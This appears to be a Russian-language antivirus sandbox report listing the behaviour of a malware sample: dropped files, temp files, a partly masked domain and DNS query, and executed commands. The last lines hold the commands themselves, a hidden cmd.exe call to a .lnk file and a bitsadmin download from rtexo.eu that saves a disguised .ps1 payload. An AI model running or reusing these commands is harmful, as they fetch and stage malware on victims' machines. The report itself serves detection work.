Техническая информация
- C:\users\public\documents\ikgkcigz.lnk
- %WINDIR%\temp\cabe206.tmp
- %WINDIR%\temp\tare207.tmp
- %WINDIR%\temp\cabe227.tmp
- %WINDIR%\temp\tare228.tmp
- %WINDIR%\temp\cabf803.tmp
- %WINDIR%\temp\tarf804.tmp
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\temp\cabe206.tmp
- %WINDIR%\temp\tare207.tmp
- %WINDIR%\temp\cabe227.tmp
- %WINDIR%\temp\tare228.tmp
- %WINDIR%\temp\cabf803.tmp
- %WINDIR%\temp\tarf804.tmp
- 'rt##o.eu':443
- DNS ASK rt##o.eu
- '<SYSTEM32>\cmd.exe' /c c:\Users\Public\Documents\iKGkciGZ.lnk https://rtexo.eu/doc/x2401.jpg c:\Users\Public\Documents\yMbExkIY.ps1' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c c:\Users\Public\Documents\iKGkciGZ.lnk https://rtexo.eu/doc/x2401.jpg c:\Users\Public\Documents\yMbExkIY.ps1
- '<SYSTEM32>\bitsadmin.exe' /transfer CCteyD /download /priority FOREGROUND https://rtexo.eu/doc/x2401.jpg c:\Users\Public\Documents\yMbExkIY.ps1